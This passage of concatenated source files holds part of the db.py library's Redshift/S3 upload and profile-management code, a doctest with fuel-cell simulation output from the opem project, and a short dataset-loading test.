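# DataFrame below are made up, and AWS keys are assumed to be available as
# the AWS_ACCESS_KEY / AWS_SECRET_KEY environment variables.
from db import DB
import pandas as pd
db = DB(username="hank", password="<PASSWORD>", hostname="dw.mardukas.com",
port=5439, dbname="dw", dbtype="redshift")
df = pd.DataFrame({"a": [1, 2, 3], "b": ["x", "y", "z"]})
db.to_redshift("my_new_table", df, drop_if_exists=True, chunk_size=10000)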
"""
if self.dbtype!="redshift":
raise Exception("Sorry, feature only available for redshift.")
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from boto.s3.connection import Location
# if boto is present, set the bucket_location to default.
# we can't do this in the function definition because we're
# lazily importing boto only if necessary here.
if bucket_location is None:
bucket_location = Location.DEFAULT
except ImportError:
raise Exception("Couldn't find boto library. Please ensure it is installed")
if s3 is not None:
AWS_ACCESS_KEY = s3.access_key
AWS_SECRET_KEY = s3.secret_key
if AWS_ACCESS_KEY is None:
AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY')
if AWS_SECRET_KEY is None:
AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY')
if AWS_ACCESS_KEY is None:
raise Exception("Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`")
if AWS_SECRET_KEY is None:
raise Exception("Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`")
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
# this way users with permission on specific buckets can use this feature
bucket_name = "dbpy-{0}".format(uuid.uuid4())
if s3_bucket:
bucket = conn.get_bucket(s3_bucket)
bucket_name = s3_bucket
else:
bucket = conn.create_bucket(bucket_name, location=bucket_location)
# we're going to chunk the file into pieces. according to amazon, this is
# much faster when it comes time to run the \COPY statement.
#
# see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html
sys.stderr.write("Transfering {0} to s3 in chunks".format(name))
len_df = len(df)
chunks = range(0, len_df, chunk_size)
def upload_chunk(i):
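# each worker thread opens its own S3 connection and uploads one gzipped
# CSV slice of the DataFrame, so the later COPY can pick the files up by prefix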
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
chunk = df[i:(i+chunk_size)]
k = Key(bucket)
k.key = '<KEY>' % (i, i + chunk_size)
k.set_metadata('parent', 'db.py')
out = StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(chunk.to_csv(index=False, encoding='utf-8'))
k.set_contents_from_string(out.getvalue())
sys.stderr.write(".")
return i
threads = []
for i in chunks:
t = threading.Thread(target=upload_chunk, args=(i, ))
t.start()
threads.append(t)
# join all threads
for t in threads:
t.join()
sys.stderr.write("done\n")
if drop_if_exists:
sql = "DROP TABLE IF EXISTS {0};".format(name)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
# generate schema from pandas and then adapt for redshift
sql = pd.io.sql.get_schema(df, name)
# defaults to using SQLite format. need to convert it to Postgres
sql = sql.replace("[", "").replace("]", "")
# we'll create the table ONLY if it doesn't exist
sql = sql.replace("CREATE TABLE", "CREATE TABLE IF NOT EXISTS")
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
# perform the \COPY here. the s3 argument is a prefix, so it'll pick up
# all of the data*.gz files we've created
sys.stderr.write("Copying data from s3 to redshfit...")
sql = """
copy {name} from 's3://{bucket_name}/data'
credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}'
CSV IGNOREHEADER as 1 GZIP;
""".format(name=name, bucket_name=bucket_name,
AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
sys.stderr.write("done!\n")
# tear down the bucket
sys.stderr.write("Tearing down bucket...")
for key in bucket.list():
key.delete()
if not s3_bucket:
conn.delete_bucket(bucket_name)
sys.stderr.write("done!")
def to_dict(self):
"""Dict representation of the database as credentials plus tables dict representation."""
db_dict = self.credentials
db_dict.update(self.tables.to_dict())
return db_dict
def list_profiles():
"""
Lists all of the database profiles available
Examples
--------
No doctest, covered by unittest
list_profiles()
{'demo': {u'dbname': None,
u'dbtype': u'sqlite',
u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite',
u'hostname': u'localhost',
u'password': None,
u'port': 5432,
u'username': None},
'muppets': {u'dbname': u'muppetdb',
u'dbtype': u'postgres',
u'filename': None,
u'hostname': u'muppets.yhathq.com',
u'password': <PASSWORD>,
u'port': 5432,
u'username': u'kermit'}}
"""
profiles = {}
user = os.path.expanduser("~")
for f in os.listdir(user):
if f.startswith(".db.py_"):
profile = load_from_json(os.path.join(user, f))
tables = profile.pop('tables', None)
if tables:
profile['metadata'] = True
else:
profile['metadata'] = False
profiles[f[7:]] = profile
return profiles
def remove_profile(name, s3=False):
"""
Removes a profile from your config
"""
user = os.path.expanduser("~")
if s3:
f = os.path.join(user, S3_PROFILE_ID + name)
else:
f = os.path.join(user, DBPY_PROFILE_ID + name)
try:
try:
open(f)
except:
raise Exception("Profile '{0}' does not exist. Could not find file {1}".format(name, f))
os.remove(f)
except Exception as e:
raise Exception("Could not remove profile {0}! Excpetion: {1}".format(name, e))
def DemoDB(keys_per_column=None, **kwargs):
"""
Provides an instance of DB that hooks up to the Chinook DB
See http://chinookdatabase.codeplex.com/ for more info.
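Examples
--------
# illustrative usage
from db import DemoDB
db = DemoDB()
db.tables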
"""
_ROOT = os.path.abspath(os.path.dirname(__file__))
chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite')
return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)
|
opem/Test/test_Padulles_Amphlett.py | Martenet/opem | 173 | 12797517 | # -*- coding: utf-8 -*-
'''
>>> from opem.Dynamic.Padulles_Amphlett import *
>>> import shutil
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.0684154992732005 V
Eta Activation : 0.18557231242539243 V
Eta Concentration : 1.948431634418616e-05 V
Eta Ohmic : 0.00017548304819292376 V
FC Efficiency : 0.6589203974773784
FC Power : 0.5139579100323552 W
FC Voltage : 5.1395791003235525 V
Loss : 0.18576727978992955 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 0.1010420899676448 W
###########
I : 0.2
E : 6.068413961701556 V
Eta Activation : 0.23146009851376736 V
Eta Concentration : 3.899435456560147e-05 V
Eta Ohmic : 0.0003510800160998837 V
FC Efficiency : 0.6293798842665886
FC Power : 0.9818326194558784 W
FC Voltage : 4.909163097279392 V
Loss : 0.23185017288443285 V
PH2 : 0.1971566919511875 atm
PH2O : 0.24266586776736396 atm
PO2 : 0.1906184358000996 atm
Power-Thermal : 0.24816738054412169 W
###########
I : 0.3
E : 6.068412424065923 V
Eta Activation : 0.2583036192079603 V
Eta Concentration : 5.853018266659147e-05 V
Eta Ohmic : 0.0005267910327125488 V
FC Efficiency : 0.6120471438396443
FC Power : 1.4321903165847678 W
FC Voltage : 4.7739677219492265 V
Loss : 0.25888894042333943 V
PH2 : 0.19714264156957312 atm
PH2O : 0.24264857417203542 atm
PO2 : 0.1906105029619013 atm
Power-Thermal : 0.41280968341523216 W
###########
I : 0.4
E : 6.068410886366294 V
Eta Activation : 0.27735002084480426 V
Eta Concentration : 7.809186891953766e-05 V
Eta Ohmic : 0.0007026162388380664 V
FC Efficiency : 0.5997124668722417
FC Power : 1.8711028966413943 W
FC Voltage : 4.677757241603485 V
Loss : 0.27813072895256186 V
PH2 : 0.19712859118795872 atm
PH2O : 0.24263128057670688 atm
PO2 : 0.19060257012370302 atm
Power-Thermal : 0.588897103358606 W
###########
I : 0.5
E : 6.068409348602667 V
Eta Activation : 0.2921240370409447 V
Eta Concentration : 9.76794818682758e-05 V
Eta Ohmic : 0.0008785557847524419 V
FC Efficiency : 0.5901164085980564
FC Power : 2.30145399353242 W
FC Voltage : 4.60290798706484 V
Loss : 0.2931002723075654 V
PH2 : 0.19711454080634436 atm
PH2O : 0.24261398698137834 atm
PO2 : 0.1905946372855047 atm
Power-Thermal : 0.7735460064675803 W
###########
I : 0.6
E : 6.0684078107750326 V
Eta Activation : 0.3041956781419353 V
Eta Concentration : 0.00011729309032954864 V
Eta Ohmic : 0.0010546098289093816 V
FC Efficiency : 0.5822525519832258
FC Power : 2.724941943281497 W
FC Voltage : 4.541569905469162 V
Loss : 0.30536758106117423 V
PH2 : 0.19710049042472996 atm
PH2O : 0.2425966933860498 atm
PO2 : 0.1905867044473064 atm
Power-Thermal : 0.9650580567185031 W
###########
I : 0.7
E : 6.068406272883388 V
Eta Activation : 0.31440243547871893 V
Eta Concentration : 0.00013693276339445145 V
Eta Ohmic : 0.0012307785370829418 V
FC Efficiency : 0.5755840434599239
FC Power : 3.1426888772911847 W
FC Voltage : 4.489555538987407 V
Loss : 0.3157701467791963 V
PH2 : 0.19708644004311557 atm
PH2O : 0.24257939979072127 atm
PO2 : 0.19057877160910808 atm
Power-Thermal : 1.1623111227088154 W
###########
I : 0.8
E : 6.068404734927729 V
Eta Activation : 0.3232442167420945 V
Eta Concentration : 0.00015659857042988755 V
Eta Ohmic : 0.0014070620817435461 V
FC Efficiency : 0.569790429225178
FC Power : 3.555492278365111 W
FC Voltage : 4.4443653479563885 V
Loss : 0.324807877394268 V
PH2 : 0.19707238966150117 atm
PH2O : 0.24256210619539273 atm
PO2 : 0.1905708387709098 atm
Power-Thermal : 1.3645077216348895 W
###########
I : 0.9
E : 6.068403196908046 V
Eta Activation : 0.3310434726426763 V
Eta Concentration : 0.0001762905810800498 V
Eta Ohmic : 0.0015834606415773538 V
FC Efficiency : 0.5646650099463304
FC Power : 3.96394836982324 W
FC Voltage : 4.404387077581378 V
Loss : 0.3328032238653337 V
PH2 : 0.19705833927988675 atm
PH2O : 0.24254481260006414 atm
PO2 : 0.19056290593271147 atm
Power-Thermal : 1.5710516301767605 W
###########
I : 1.0
E : 6.068401658824337 V
Eta Activation : 0.33802037026202836 V
Eta Concentration : 0.0001960088652678871 V
Eta Ohmic : 0.0017599744011013664 V
FC Efficiency : 0.5600666527156857
FC Power : 4.368519891182348 W
FC Voltage : 4.368519891182348 V
Loss : 0.3399763535283976 V
PH2 : 0.19704428889827239 atm
PH2O : 0.2425275190047356 atm
PO2 : 0.1905549730945132 atm
Power-Thermal : 1.781480108817652 W
###########
I : 1.1
E : 6.068400120676597 V
Eta Activation : 0.3443319458183834 V
Eta Concentration : 0.00021575349319660598 V
Eta Ohmic : 0.0019366035503462617 V
FC Efficiency : 0.55589469312397
FC Power : 4.769576467003663 W
FC Voltage : 4.335978606366966 V
Loss : 0.3464843028619262 V
PH2 : 0.197030238516658 atm
PH2O : 0.24251022540940706 atm
PO2 : 0.19054704025631486 atm
Power-Thermal : 1.9954235329963377 W
###########
I : 1.2
E : 6.068398582464819 V
Eta Activation : 0.35009414904739194 V
Eta Concentration : 0.00023552453535116493 V
Eta Ohmic : 0.002113348284589288 V
FC Efficiency : 0.5520748042471996
FC Power : 5.1674201677537885 W
FC Voltage : 4.306183473128157 V
Loss : 0.3524430218673324 V
PH2 : 0.1970161881350436 atm
PH2O : 0.24249293181407852 atm
PO2 : 0.19053910741811658 atm
Power-Thermal : 2.212579832246212 W
###########
I : 1.3
E : 6.068397044188998 V
Eta Activation : 0.35539503345654255 V
Eta Concentration : 0.0002553220624997795 V
Eta Ohmic : 0.0022902088041253615 V
FC Efficiency : 0.5485505413555333
FC Power : 5.562302489345107 W
FC Voltage : 4.27869422257316 V
Loss : 0.3579405643231677 V
PH2 : 0.19700213775342923 atm
PH2O : 0.24247563821874998 atm
PO2 : 0.19053117457991825 atm
Power-Thermal : 2.432697510654893 W
###########
I : 1.4
E : 6.06839550584913 V
Eta Activation : 0.36030304442922906 V
Eta Concentration : 0.00027514614569545357 V
Eta Ohmic : 0.0024671853140681515 V
FC Efficiency : 0.5452780290261753
FC Power : 5.954436076965834 W
FC Voltage : 4.253168626404167 V
Loss : 0.36304537588899266 V
PH2 : 0.19698808737181484 atm
PH2O : 0.24245834462342142 atm
PO2 : 0.19052324174171997 atm
Power-Thermal : 2.6555639230341663 W
###########
I : 1.5
E : 6.068393967445208 V
Eta Activation : 0.3648724409731032 V
Eta Concentration : 0.0002949968562774962 V
Eta Ohmic : 0.002644278024175193 V
FC Efficiency : 0.5422224856637728
FC Power : 6.344003082266143 W
FC Voltage : 4.229335388177429 V
Loss : 0.3678117158535559 V
PH2 : 0.19697403699020044 atm
PH2O : 0.24244105102809288 atm
PO2 : 0.19051530890352164 atm
Power-Thermal : 2.8809969177338575 W
###########
I : 1.6
E : 6.068392428977227 V
Eta Activation : 0.36914696409844006 V
Eta Concentration : 0.0003148742658730733 V
Eta Ohmic : 0.0028214871486926026 V
FC Efficiency : 0.5393558719759229
FC Power : 6.731161282259518 W
FC Voltage : 4.206975801412199 V
Loss : 0.37228332551300575 V
PH2 : 0.19695998660858605 atm
PH2O : 0.24242375743276434 atm
PO2 : 0.19050737606532336 atm
Power-Thermal : 3.1088387177404826 W
###########
I : 1.7
E : 6.068390890445182 V
Eta Activation : 0.3731623911228729 V
Eta Concentration : 0.0003347784463987542 V
Eta Ohmic : 0.0029988129062160497 V
FC Efficiency : 0.5366552535984287
FC Power : 7.116048662715165 W
FC Voltage : 4.185910978067744 V
Loss : 0.3764959824754877 V
PH2 : 0.19694593622697168 atm
PH2O : 0.2424064638374358 atm
PO2 : 0.19049944322712503 atm
Power-Thermal : 3.338951337284836 W
###########
I : 1.8
E : 6.068389351849069 V
Eta Activation : 0.3769483587657406 V
Eta Concentration : 0.0003547094700620668 V
Eta Ohmic : 0.003176255519565377 V
FC Efficiency : 0.5341016324451575
FC Power : 7.498786919530012 W
FC Voltage : 4.165992733072229 V
Loss : 0.380479323755368 V
PH2 : 0.19693188584535729 atm
PH2O : 0.24238917024210727 atm
PO2 : 0.19049151038892673 atm
Power-Thermal : 3.5712130804699886 W
###########
I : 1.9
E : 6.068387813188879 V
Eta Activation : 0.38052969267197334 V
Eta Concentration : 0.0003746674093630815 V
Eta Ohmic : 0.0033538152156708046 V
FC Efficiency : 0.5316790944492106
FC Power : 7.879484179737301 W
FC Voltage : 4.147096936703843 V
Loss : 0.38425817529700723 V
PH2 : 0.1969178354637429 atm
PH2O : 0.24237187664677873 atm
PO2 : 0.19048357755072845 atm
Power-Thermal : 3.8055158202626993 W
###########
I : 2.0
E : 6.0683862744646095 V
Eta Activation : 0.3839273955127959 V
Eta Concentration : 0.00039465233709598025 V
Eta Ohmic : 0.003531492225469087 V
FC Efficiency : 0.5293741761651032
FC Power : 8.25823714817561 W
FC Voltage : 4.129118574087805 V
Loss : 0.387853540075361 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 4.041762851824391 W
###########
I : 2.1
E : 6.068384735676256 V
Eta Activation : 0.38715939375662295 V
Eta Concentration : 0.00041466432635066115 V
Eta Ohmic : 0.0037092867838082735 V
FC Efficiency : 0.5271753860695316
FC Power : 8.635132823818928 W
FC Voltage : 4.111968011342347 V
Loss : 0.3912833448667819 V
PH2 : 0.19688973470051413 atm
PH2O : 0.24233728945612165 atm
PO2 : 0.19046771187433184 atm
Power-Thermal : 4.279867176181073 W
###########
I : 2.2
E : 6.068383196823811 V
Eta Activation : 0.39024111055794025 V
Eta Concentration : 0.0004347034505143372 V
Eta Ohmic : 0.0038871991293599716 V
FC Efficiency : 0.5250728373249665
FC Power : 9.010249888496427 W
FC Voltage : 4.095568131134739 V
Loss : 0.39456301313781456 V
PH2 : 0.19687568431889974 atm
PH2O : 0.2423199958607931 atm
PO2 : 0.1904597790361335 atm
Power-Thermal : 4.519750111503576 W
###########
I : 2.3
E : 6.068381657907269 V
Eta Activation : 0.39318591119501267 V
Eta Concentration : 0.00045476978327314626 V
Eta Ohmic : 0.004065229504538212 V
FC Efficiency : 0.5230579622427114
FC Power : 9.383659842634243 W
FC Voltage : 4.079852105493149 V
Loss : 0.397705910482824 V
PH2 : 0.19686163393728537 atm
PH2O : 0.24230270226546458 atm
PO2 : 0.19045184619793523 atm
Power-Thermal : 4.761340157365757 W
###########
I : 2.4
E : 6.068380118926627 V
Eta Activation : 0.3960054536369255 V
Eta Concentration : 0.00047486339861378836 V
Eta Ohmic : 0.004243378155424144 V
FC Efficiency : 0.5211232875604884
FC Power : 9.755427943132343 W
FC Voltage : 4.06476164297181 V
Loss : 0.40072369519096346 V
PH2 : 0.19684758355567097 atm
PH2O : 0.242285408670136 atm
PO2 : 0.1904439133597369 atm
Power-Thermal : 5.004572056867657 W
###########
I : 2.5
E : 6.068378579881878 V
Eta Activation : 0.39870996749954657 V
Eta Concentration : 0.000494984370825149 V
Eta Ohmic : 0.00442164533169592 V
FC Efficiency : 0.5192622556245563
FC Power : 10.12561398467885 W
FC Voltage : 4.05024559387154 V
Loss : 0.4036265972020676 V
PH2 : 0.19683353317405658 atm
PH2O : 0.24226811507480747 atm
PO2 : 0.19043598052153862 atm
Power-Thermal : 5.249386015321152 W
###########
I : 2.6
E : 6.068377040773017 V
Eta Activation : 0.40130847825734167 V
Eta Concentration : 0.0005151327744999589 V
Eta Ohmic : 0.004600031286563196 V
FC Efficiency : 0.5174690806642298
FC Power : 10.494272955870581 W
FC Voltage : 4.036258829180992 V
Loss : 0.40642364231840483 V
PH2 : 0.19681948279244216 atm
PH2O : 0.2422508214794789 atm
PO2 : 0.1904280476833403 atm
Power-Thermal : 5.495727044129421 W
###########
I : 2.7
E : 6.068375501600038 V
Eta Activation : 0.4038089891176398 V
Eta Concentration : 0.0005353086845364485 V
Eta Ohmic : 0.004778536276705824 V
FC Efficiency : 0.5157386322058496
FC Power : 10.861455594255196 W
FC Voltage : 4.022761331205627 V
Loss : 0.40912283407888206 V
PH2 : 0.19680543241082776 atm
PH2O : 0.24223352788415034 atm
PO2 : 0.190420114845142 atm
Power-Thermal : 5.7435444057448075 W
###########
I : 2.8
E : 6.068373962362936 V
Eta Activation : 0.40621862980268425 V
Eta Concentration : 0.000555512176140013 V
Eta Ohmic : 0.004957160562216277 V
FC Efficiency : 0.5140663396997094
FC Power : 11.227208859041653 W
FC Voltage : 4.0097174496577335 V
Loss : 0.41173130254104057 V
PH2 : 0.1967913820292134 atm
PH2O : 0.2422162342888218 atm
PO2 : 0.19041218200694368 atm
Power-Thermal : 5.992791140958347 W
###########
I : 2.9
E : 6.068372423061707 V
Eta Activation : 0.4085437792118771 V
Eta Concentration : 0.0005757433248249061 V
Eta Ohmic : 0.005135904406545483 V
FC Efficiency : 0.5124481138904448
FC Power : 11.591576336201861 W
FC Voltage : 3.997095288345469 V
Loss : 0.4142554269432475 V
PH2 : 0.196777331647599 atm
PH2O : 0.24219894069349326 atm
PO2 : 0.1904042491687454 atm
Power-Thermal : 6.24342366379814 W
###########
I : 3.0
E : 6.0683708836963435 V
Eta Activation : 0.4107901672807063 V
Eta Concentration : 0.0005960022064159204 V
Eta Ohmic : 0.005314768076451755 V
FC Efficiency : 0.5108802815228812
FC Power : 11.95459858763542 W
FC Voltage : 3.9848661958784737 V
Loss : 0.41670093756357396 V
PH2 : 0.1967632812659846 atm
PH2O : 0.24218164709816473 atm
PO2 : 0.19039631633054707 atm
Power-Thermal : 6.49540141236458 W
###########
I : 3.1
E : 6.068369344266841 V
Eta Activation : 0.4129629601316751 V
Eta Concentration : 0.0006162888970501038 V
Eta Ohmic : 0.0054937518419525275 V
FC Efficiency : 0.5093595307581349
FC Power : 12.316313453731704 W
FC Voltage : 3.9730043399134525 V
Loss : 0.4190730008706778 V
PH2 : 0.19674923088437024 atm
PH2O : 0.2421643535028362 atm
PO2 : 0.1903883834923488 atm
Power-Thermal : 6.748686546268298 W
###########
I : 3.2
E : 6.068367804773196 V
Eta Activation : 0.41506683170178466 V
Eta Concentration : 0.0006366034731784721 V
Eta Ohmic : 0.005672855976278701 V
FC Efficiency : 0.507882865258588
FC Power : 12.676756316854359 W
FC Voltage : 3.9614863490169867 V
Loss : 0.4213762911512418 V
PH2 : 0.19673518050275585 atm
PH2O : 0.24214705990750765 atm
PO2 : 0.19038045065415046 atm
Power-Thermal : 7.003243683145644 W
###########
I : 3.3
E : 6.0683662652154 V
Eta Activation : 0.417106024344736 V
Eta Concentration : 0.0006569460115677318 V
Eta Ohmic : 0.005852080755831333 V
FC Efficiency : 0.5064475653403494
FC Power : 13.035960331860592 W
FC Voltage : 3.950291009654725 V
Loss : 0.42361505111213504 V
PH2 : 0.19672113012114145 atm
PH2O : 0.2421297663121791 atm
PO2 : 0.19037251781595219 atm
Power-Thermal : 7.259039668139408 W
###########
I : 3.4
E : 6.06836472559345 V
Eta Activation : 0.4190844003836543 V
Eta Concentration : 0.0006773165893020328 V
Eta Ohmic : 0.0060314264601405215 V
FC Efficiency : 0.5050511549266622
FC Power : 13.393956628655083 W
FC Voltage : 3.9393990084279658 V
Loss : 0.4257931434330969 V
PH2 : 0.19670707973952706 atm
PH2O : 0.24211247271685057 atm
PO2 : 0.19036458497775385 atm
Power-Thermal : 7.516043371344917 W
###########
I : 3.5
E : 6.068363185907339 V
Eta Activation : 0.42100548618901656 V
Eta Concentration : 0.0006977152837847073 V
Eta Ohmic : 0.006210893371826288 V
FC Efficiency : 0.5036913732928463
FC Power : 13.750774490894704 W
FC Voltage : 3.9287927116842014 V
Loss : 0.42791409484462756 V
PH2 : 0.1966930293579127 atm
PH2O : 0.24209517912152204 atm
PO2 : 0.19035665213955555 atm
Power-Thermal : 7.774225509105296 W
###########
I : 3.6
E : 6.068361646157063 V
Eta Activation : 0.4228725100457559 V
Eta Concentration : 0.0007181421727400468 V
Eta Ohmic : 0.006390481776561363 V
FC Efficiency : 0.5023661507925354
FC Power : 14.106441514254398 W
FC Voltage : 3.918455976181777 V
Loss : 0.4299811339950573 V
PH2 : 0.1966789789762983 atm
PH2O : 0.2420778855261935 atm
PO2 : 0.19034871930135727 atm
Power-Thermal : 8.033558485745605 W
###########
I : 3.7
E : 6.068360106342617 V
Eta Activation : 0.4246884348310017 V
Eta Concentration : 0.0007385973342150736 V
Eta Ohmic : 0.00657019196303564 V
FC Efficiency : 0.50107358791043
FC Power : 14.460983747095012 W
FC Voltage : 3.9083739857013544 V
Loss : 0.4319972241282524 V
PH2 : 0.1966649285946839 atm
PH2O : 0.24206059193086493 atm
PO2 : 0.19034078646315894 atm
Power-Thermal : 8.29401625290499 W
###########
I : 3.8
E : 6.068358566463993 V
Eta Activation : 0.4264559863331208 V
Eta Concentration : 0.0007590808465813247 V
Eta Ohmic : 0.006750024222922298 V
FC Efficiency : 0.49981193710908595
FC Power : 14.814425815913308 W
FC Voltage : 3.8985331094508706 V
Loss : 0.43396509140262446 V
PH2 : 0.19665087821306954 atm
PH2O : 0.2420432983355364 atm
PO2 : 0.19033285362496066 atm
Power-Thermal : 8.555574184086693 W
###########
I : 3.9
E : 6.068357026521189 V
Eta Activation : 0.42817767789163225 V
Eta Concentration : 0.0007795927885366656 V
Eta Ohmic : 0.006929978850845375 V
FC Efficiency : 0.49857958703411753
FC Power : 15.166791037577857 W
FC Voltage : 3.888920778866117 V
Loss : 0.4358872495310143 V
PH2 : 0.19663682783145514 atm
PH2O : 0.24202600474020786 atm
PO2 : 0.19032492078676233 atm
Power-Thermal : 8.818208962422144 W
###########
Report is generating ...
Done!
>>> Padulles_Amphlett_Data["Status"]
True
>>> Padulles_Amphlett_Data["P"][5]
2.724941943281497
>>> Padulles_Amphlett_Data["I"][5]
0.6
>>> Padulles_Amphlett_Data["V"][5]
4.541569905469162
>>> Padulles_Amphlett_Data["EFF"][5]
0.5822525519832258
>>> Padulles_Amphlett_Data["PO2"][5]
0.1905867044473064
>>> Padulles_Amphlett_Data["PH2"][5]
0.19710049042472996
>>> Padulles_Amphlett_Data["PH2O"][5]
0.2425966933860498
>>> Padulles_Amphlett_Data["Ph"][5]
0.9650580567185031
>>> Padulles_Amphlett_Data["VE"][5]
4.553525621759973
>>> Padulles_Amphlett_Data["V0"]
4.698326931114575
>>> Padulles_Amphlett_Data["K"]
-0.24133551559100302
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)
>>> Padulles_Amphlett_Data["Status"]
False
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)
2.9
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)
[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.14455344314445 V
Eta Activation : 0.9092187394310518 V
Eta Concentration : 1.1361117401857817e-07 V
Eta Ohmic : 4.63717533307516e+269 V
FC Efficiency : -2.9725482904327946e+269
FC Power : -2.3185876665375803e+269 W
FC Voltage : -2.3185876665375803e+270 V
Loss : 4.63717533307516e+269 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 2.3185876665375803e+269 W
###########
I : 2.0
E : 6.144553272737403 V
Eta Activation : 0.9103753288368093 V
Eta Concentration : 2.301179808139826e-06 V
Eta Ohmic : 9.331810347802308e+270 V
FC Efficiency : -5.981929710129684e+270
FC Power : -9.331810347802308e+271 W
FC Voltage : -4.665905173901154e+271 V
Loss : 9.331810347802308e+270 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 9.331810347802308e+271 W
###########
I : 4.0
E : 6.144553093215826 V
Eta Activation : 0.9106431331307118 V
Eta Concentration : 4.6654999364844955e-06 V
Eta Ohmic : 1.8785852500552963e+271 V
FC Efficiency : -1.2042213141380103e+271
FC Power : -3.757170500110593e+272 W
FC Voltage : -9.392926250276482e+271 V
Loss : 1.8785852500552963e+271 V
PH2 : 0.19662277744984075 atm
PH2O : 0.24200871114487932 atm
PO2 : 0.19031698794856405 atm
Power-Thermal : 3.757170500110593e+272 W
###########
Report is generating ...
Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs
Done!
>>> shutil.rmtree("Padulles-Amphlett")
'''
|
tests/r/test_rep_vict.py | hajime9652/observations | 199 | 12797520 | <filename>tests/r/test_rep_vict.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.rep_vict import rep_vict
def test_rep_vict():
"""Test module rep_vict.py by downloading
rep_vict.csv and testing shape of
extracted data has 8 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = rep_vict(test_path)
try:
assert x_train.shape == (8, 8)
except:
shutil.rmtree(test_path)
raise
|